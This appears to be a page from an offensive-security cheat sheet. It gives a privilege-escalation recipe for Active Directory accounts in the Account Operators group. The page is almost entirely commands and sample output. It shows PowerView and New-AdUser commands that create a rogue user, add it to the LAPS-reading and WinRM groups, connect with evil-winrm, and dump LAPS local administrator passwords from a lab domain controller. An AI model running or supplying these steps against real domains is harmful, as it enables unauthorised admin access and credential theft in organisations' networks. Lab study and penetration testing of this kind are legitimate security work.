TLDRBins TLDRBins / Account Operators

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Privesc #1: Create a new user account and add it to LAPS (Local Administrator Password Solution) group

1. Import PowerView.ps1

. .\PowerView.ps1

Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a cred object (runas) [optional]

$username = '<DOMAIN>\<USER>'

Sample Output:
TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force

Sample Output:
TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password

Sample Output:
TO-DO

3. Create a new user password object

$new_user_password = ConvertTo-SecureString '<NEW_USER_PASSWORD>' -AsPlainText -Force

Sample Output:
*Evil-WinRM* PS C:\programdata> $new_user_password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force

4. Create a new user account

New-AdUser '<NEW_USER>' -enabled $true -accountpassword $new_user_password -Credential $cred

Sample Output:
*Evil-WinRM* PS C:\programdata> New-AdUser 'alice' -enabled $true -accountpassword $new_user_password -Credential $cred

5. Add the new user to LAPS group

Add-DomainGroupMember -Identity 'LAPS READ' -Members '<NEW_USER>' -Credential $cred

Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'LAPS READ' -Members 'alice' -Credential $cred

6. Add the new user to WinRM group

Add-DomainGroupMember -Identity 'WinRM' -Members '<NEW_USER>' -Credential $cred

Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity WinRM -Credential $cred -Members 'alice'

7. Remote as new user

evil-winrm -i <TARGET> -u '<NEW_USER>' -p '<NEW_USER_PASSWORD>'

Sample Output:
$ evil-winrm -i 127.0.0.1 -u alice -p 'Test1234'              
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice\Documents>

8. Read LAPS password

Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

Sample Output:
*Evil-WinRM* PS C:\Users\alice\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName       : PivotAPI.LicorDeBellota.htb
Enabled           : True
ms-Mcs-AdmPwd     : 82SD67Cuq34TPZm4mnFo
Name              : PIVOTAPI
ObjectClass       : computer
ObjectGUID        : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName    : PIVOTAPI$
SID               : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :